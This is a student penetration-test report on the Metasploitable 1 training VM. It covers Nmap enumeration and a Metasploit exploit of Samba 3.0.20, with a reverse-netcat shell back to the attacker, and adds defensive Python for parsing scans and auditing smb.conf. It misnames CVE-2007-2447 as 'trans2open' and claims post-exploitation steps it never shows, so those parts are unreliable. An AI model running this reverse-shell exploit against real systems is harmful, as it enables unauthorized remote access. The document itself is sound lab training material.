Penetration Testing Report

The project report details the exploitation of Metasploitable 1, a vulnerable Linux machine, to practice penetration testing techniques. It outlines the objectives, tools used, and the five phases of the hacking methodology, culminating in the successful exploitation of a known vulnerability in Samba 3.0.20. Recommendations for mitigating identified risks include updating services, enforcing strong access controls, and conducting regular security audits.

Uploaded by: Cyber Plane

Project Report: Exploitation of Metasploitable 1

Student Name: ImoleAyo
Course: Cyber Security
Instructor: Adisa Toheeb Kayode

EXECUTIVE SUMMARY

Metasploitable 1 is a deliberately vulnerable Linux machine designed for testing and practicing penetration testing techniques. This project aims to exploit its vulnerabilities, analyze the security flaws, and provide insights into the exploitation process.

Objectives

- Identify vulnerabilities in the Metasploitable 1 server.
- Perform exploitation using penetration testing tools.
- Document the exploitation process and suggest potential mitigation strategies.

Tools and Environment

- Virtualization Platform: VMware Workstation
- Target Machine: Metasploitable 1
- Operating System: Linux-based (Ubuntu 8.04)
- Tools Used:
  - Nmap
  - Metasploit Framework

Lab Installation

As part of this project, I targeted Metasploitable 1, a deliberately vulnerable Linux-based virtual machine designed for penetration testing practice. The Metasploitable 1 image was downloaded from an online source and extracted to the Documents folder on my system. Once extracted, I imported and launched the virtual machine using VMware Workstation. During the initial boot, I successfully logged in using the default credentials provided by the system:

- Username: msfadmin
- Password: msfadmin

A screenshot confirming successful login is included below.

After successfully logging into the Metasploitable 1 virtual machine, I executed the ifconfig command to identify its IP address. The output revealed that the target system was assigned the IP address 192.168.84.136. An IP address serves as a unique identifier for a device on a network, allowing it to communicate with other systems.

With the target system identified, I proceeded to perform a comprehensive penetration test using the five standard phases of the hacking methodology, which include:

1. Information Gathering: Collecting preliminary data about the target system and environment.
2. Scanning and Enumeration: Identifying open ports, services, and system details to uncover potential vulnerabilities.
3. Exploitation: Actively leveraging discovered vulnerabilities to gain unauthorized access.
4. Post-Exploitation: Exploring the compromised system for sensitive information, privilege escalation, and maintaining access.
5. Documentation and Reporting: Compiling all findings, steps taken, and remediation recommendations into a structured report.

Step 1: Information Gathering

In this phase of the penetration test, I focused on Information Gathering, which is often considered the most critical stage of the process, accounting for approximately 70% of the overall penetration effort. This stage involves collecting as much data as possible about the target system to lay the groundwork for subsequent attacks.

Having already identified the IP address of the Metasploitable 1 target as 192.168.84.136, I proceeded to verify that the system was active and reachable on the network. To do this, I issued a ping request from my attacking machine:

The target responded successfully, confirming that it was live and connected to the network, making it ready for further reconnaissance and scanning.

Step 2: Scanning and Enumeration

After confirming that the target machine at 192.168.84.136 was online, I proceeded to the Scanning and Enumeration phase of the penetration test. This stage involves identifying open ports and collecting detailed information about the services running on the target system.

Using Nmap (Network Mapper), a powerful open-source network scanning tool, I discovered that several ports were open, including:

- Port 21 – FTP (File Transfer Protocol)
- Port 22 – SSH (Secure Shell)
- Port 23 – Telnet
- Port 25 – SMTP (Simple Mail Transfer Protocol)

To begin enumerating these services one by one, I started with port 21 (FTP). I ran the following Nmap command:

nmap -sC -sV 192.168.84.136 -p 21

Explanation of the Command and Switches:

- nmap: The main command used to invoke the Nmap tool.
- -sC: This switch tells Nmap to use the default scripts from the Nmap Scripting Engine (NSE). These scripts perform tasks like banner grabbing, checking for anonymous FTP access, and gathering general information.
- -sV: Enables version detection, allowing Nmap to probe services to determine their software version (e.g., vsftpd 2.3.4).
- 192.168.84.136: The IP address of the target machine.
- -p 21: Specifies that the scan should be limited to port 21, which is typically used by FTP services.
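The scan output that the -sC and -sV switches produce is what the rest of the report is built on, so it is worth having a repeatable way to turn it into findings. The following is an added example, not code from the report: it parses a constructed sample of Nmap's normal output (the port lines and the NSE script lines that hang off them) and flags the cleartext services (FTP, Telnet) and an anonymous-FTP script result, which are exactly the items the report's later recommendations 2 and 6 act on. The sample output, the version strings in it, and the ftp-anon result are constructed for illustration and are not the report's real scan results.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in the shape of Nmap's normal (-oN / stdout) output for an
# `nmap -sC -sV` scan of the target in this report. The versions and the
# ftp-anon result are illustrative, not the report's actual scan results.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.84.136
Host is up (0.00042s latency).
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp  open  telnet      Linux telnetd
25/tcp  open  smtp        Postfix smtpd
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
"""

# Services that send credentials and data in cleartext; the report's
# recommendations 2 and 6 are to disable them or replace them with these.
CLEARTEXT_SERVICES = {"ftp": "SFTP or FTPS", "telnet": "SSH"}

# "<port>/<proto>  <state>  <service>  <version...>"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")


@dataclass
class OpenPort:
    port: int
    proto: str
    service: str
    version: str
    scripts: list = field(default_factory=list)  # NSE output lines for this port


def parse_nmap_ports(text):
    """Extract open ports, with their NSE script lines, from Nmap normal output."""
    ports, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = PORT_LINE.match(line)
        if m:
            current = None
            if m.group(3) == "open":
                current = OpenPort(int(m.group(1)), m.group(2),
                                   m.group(4), m.group(5).strip())
                ports.append(current)
        elif line.startswith("|") and current is not None:
            # "| script: ..." and "|_script: ..." lines belong to the preceding port
            current.scripts.append(line.lstrip("|_ ").strip())
    return ports


def findings(ports):
    """Return (port, finding) pairs for the issues the report's recommendations cover."""
    out = []
    for p in ports:
        if p.service in CLEARTEXT_SERVICES:
            out.append((p.port, f"{p.service} is a cleartext protocol; "
                                f"replace with {CLEARTEXT_SERVICES[p.service]}"))
        if any("Anonymous FTP login allowed" in s for s in p.scripts):
            out.append((p.port, "anonymous FTP login is enabled; disable it"))
    return out


if __name__ == "__main__":
    open_ports = parse_nmap_ports(SAMPLE_NMAP_OUTPUT)
    for p in open_ports:
        print(f"{p.port}/{p.proto} {p.service}: {p.version}")
    for port, text in findings(open_ports):
        print(f"finding on port {port}: {text}")
```

Feeding real output in is `parse_nmap_ports(open("scan.txt").read())`; for a larger inventory, Nmap's XML output (-oX) is the more robust thing to parse, but the text format is what the report shows.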
Following the FTP enumeration, I continued the Scanning and Enumeration phase by targeting port 445, which is commonly used for the SMB (Server Message Block) protocol. To do this, I ran a specific Nmap scan against the SMB port on the target machine:

Scan Results Summary:

From the output of the scan, I was able to gather valuable information about the SMB service running on the target:

- Computer Name: metasploitable
- Domain Name: localdomain
- Service: SMB
- Version: Unix Samba 3.0.20-Debian

This information confirmed that the target was running an outdated and potentially vulnerable version of Samba, specifically version 3.0.20.

Next Step – Vulnerability Research:

With the version details obtained, I proceeded to search for known exploits associated with Samba 3.0.20-Debian. This version is known to be affected by several vulnerabilities, including the well-documented remote code execution exploit commonly referred to as "Samba trans2open" or CVE-2007-2447. This vulnerability allows an unauthenticated attacker to execute arbitrary code on the target system by sending a specially crafted request to the SMB service.
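The vulnerability research step is a version comparison: the banner Nmap returned ("Unix Samba 3.0.20-Debian") is matched against the range that CVE-2007-2447 (the "username map script" command injection that the exploitation step below relies on) affects, which is Samba 3.0.0 through 3.0.25rc3, with 3.0.25 the first fixed release. The code below is an added example, not part of the report: it parses a Samba banner and decides whether the version is in the affected range, taking care that a release candidate such as 3.0.25rc3 sorts before the final 3.0.25. The banner string is the one the report found; the helper names are mine.

```python
import re

# Banner in the form Nmap's version detection reported for the target in this report.
SAMPLE_BANNER = "Unix Samba 3.0.20-Debian"

# CVE-2007-2447 ("username map script" command injection) affects Samba 3.0.0
# through 3.0.25rc3; 3.0.25 is the first fixed release. Keys are
# (major, minor, patch, rc) with inf in the rc slot meaning "final release".
AFFECTED_LOW = (3, 0, 0, 0)
FIXED_KEY = (3, 0, 25, float("inf"))

VERSION_RE = re.compile(r"Samba\s+(\d+)\.(\d+)\.(\d+)(rc(\d+))?")


def parse_samba_version(banner):
    """Return (major, minor, patch, rc) from a banner; rc is None for a final release."""
    m = VERSION_RE.search(banner)
    if not m:
        raise ValueError(f"no Samba version in banner: {banner!r}")
    major, minor, patch = int(m.group(1)), int(m.group(2)), int(m.group(3))
    rc = int(m.group(5)) if m.group(5) else None
    return major, minor, patch, rc


def version_key(version):
    """Sortable key in which a release candidate precedes its final release
    (3.0.25rc3 < 3.0.25), so the fixed version is not mistaken for an rc."""
    major, minor, patch, rc = version
    return (major, minor, patch, rc if rc is not None else float("inf"))


def affected_by_cve_2007_2447(banner):
    """True when the banner's Samba version falls inside the affected range."""
    return AFFECTED_LOW <= version_key(parse_samba_version(banner)) < FIXED_KEY


if __name__ == "__main__":
    v = parse_samba_version(SAMPLE_BANNER)
    state = "affected" if affected_by_cve_2007_2447(SAMPLE_BANNER) else "not affected"
    print(f"{SAMPLE_BANNER!r} -> version {v[:3]} rc={v[3]}: {state} by CVE-2007-2447")
```

A banner check is only a first filter: a distribution may backport the fix without changing the version string, and the flaw is only reachable when "username map script" is actually configured, so the result should be confirmed against the package's changelog and the server's smb.conf.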

Step 3: Exploitation

The Samba service running on the target machine (version 3.0.20-Debian) was identified as vulnerable to a command injection flaw through the username parameter. This vulnerability is known as CVE-2007-2447, and Metasploit provides a dedicated module to exploit it. To begin the exploitation process, I launched the Metasploit Framework by executing msfconsole. I then searched for available Samba-related modules using the command search samba, and identified the appropriate exploit module: exploit/multi/samba/usermap_script. I loaded this module using the command use exploit/multi/samba/usermap_script, and configured the target IP address using set RHOST 192.168.84.136. For the payload, I selected a reverse shell with set payload cmd/unix/reverse_netcat. To enable communication between the target and my attacking machine, I configured the local host using the IP address associated with my eth0 interface, via the command set LHOST <your_eth0_ip>, and chose port 4444 by running set LPORT 4444. Once all parameters were correctly configured, I initiated the exploit using the run command.


Recommendations

Based on the vulnerabilities discovered and successfully exploited during this penetration test, the following security recommendations are proposed to mitigate the identified risks:

1. Update and Patch Outdated Services
   - Immediately update vulnerable services such as Samba 3.0.20, which are known to contain remote code execution backdoors.
   - Regularly apply system and software patches to close known vulnerabilities.

2. Restrict Unnecessary Services
   - Disable or remove services that are not actively used (e.g., Telnet, FTP), especially if they transmit data unencrypted or are inherently insecure.

3. Enforce Strong Access Controls
   - Implement firewall rules to restrict access to critical services like SMB, SSH, and FTP to only trusted IP addresses.
   - Use strong, unique passwords for all accounts, and disable default credentials (e.g., msfadmin).

4. Implement Network Segmentation
   - Isolate sensitive systems from the general network to limit the blast radius in case of compromise.

5. Enable Logging and Intrusion Detection
   - Enable detailed logging for all authentication and network activities.
   - Deploy host-based and network-based intrusion detection/prevention systems (IDS/IPS).

6. Use Encrypted Protocols
   - Replace insecure protocols like FTP and Telnet with secure alternatives such as SFTP and SSH.

7. Conduct Regular Security Audits
   - Perform regular vulnerability scans and penetration testing to proactively identify and fix weaknesses before attackers exploit them.
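Recommendations 1 and 3 can be checked on the Samba host itself. The exploit used in Step 3 only works when smb.conf sets "username map script", which is the directive CVE-2007-2447 abuses on unpatched Samba, and SMB should in any case only be reachable from trusted addresses. The following is an added example, not code from the report: a minimal smb.conf parser and an audit that flags the weak configuration (the directive present, no "hosts allow" restriction) and passes the hardened one beside it. Both configuration fragments are constructed for this example; the script path and the trusted network in them are placeholders, and "hosts allow" / "hosts deny" are real smb.conf parameters.

```python
# Constructed smb.conf fragments (not from the report's target): a weak
# configuration that exposes the directive CVE-2007-2447 abuses and accepts
# SMB from anywhere, and a hardened one applying recommendations 1 and 3.
WEAK_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = Samba Server
   ; passes incoming usernames to an external script (placeholder path)
   username map script = /etc/samba/scripts/mapusers.sh
   log level = 1

[tmp]
   path = /tmp
   read only = no
"""

HARDENED_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = Samba Server
   # only loopback and the trusted lab network may reach SMB (placeholder range)
   hosts allow = 127. 192.168.84.
   hosts deny = ALL
   log level = 1

[tmp]
   path = /tmp
   read only = no
"""


def parse_smb_conf(text):
    """Minimal smb.conf parser: {section: {parameter: value}}, names lower-cased.
    Handles '#' and ';' comments and indented 'name = value' lines."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            name, _, value = line.partition("=")
            sections[current][name.strip().lower()] = value.strip()
    return sections


def audit_smb_conf(text):
    """Return findings for the [global] section; an empty list means both checks pass."""
    g = parse_smb_conf(text).get("global", {})
    findings = []
    if "username map script" in g:
        findings.append("username map script is set; on Samba before 3.0.25 this is the "
                        "injection point for CVE-2007-2447: remove it or upgrade Samba")
    if "hosts allow" not in g:
        findings.append("no 'hosts allow' restriction; SMB accepts connections from any "
                        "address: limit it to trusted networks")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        result = audit_smb_conf(conf) or ["no findings"]
        print(f"{label}: " + "; ".join(result))
```

Removing the directive closes this one injection point; upgrading Samba past 3.0.25 is the actual fix for the CVE, and "hosts allow" complements rather than replaces the network-layer firewall rules recommendation 3 asks for.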

Conclusion

This penetration test against the Metasploitable 1 virtual machine successfully demonstrated the practical exploitation of multiple well-known vulnerabilities. By following the five phases of the hacking methodology, I was able to:

- Discover the target's IP address using basic network tools.
- Enumerate active services and identify high-risk vulnerabilities using Nmap.
- Exploit weaknesses in Samba 3.0.20 to gain remote shell access to the system.
- Conduct post-exploitation tasks such as user enumeration and privilege identification.

The findings highlight the critical importance of maintaining up-to-date systems, disabling insecure services, and applying security best practices. While Metasploitable is an intentionally vulnerable system used for training purposes, the same vulnerabilities exist in real-world environments where they pose serious security risks if left unaddressed.
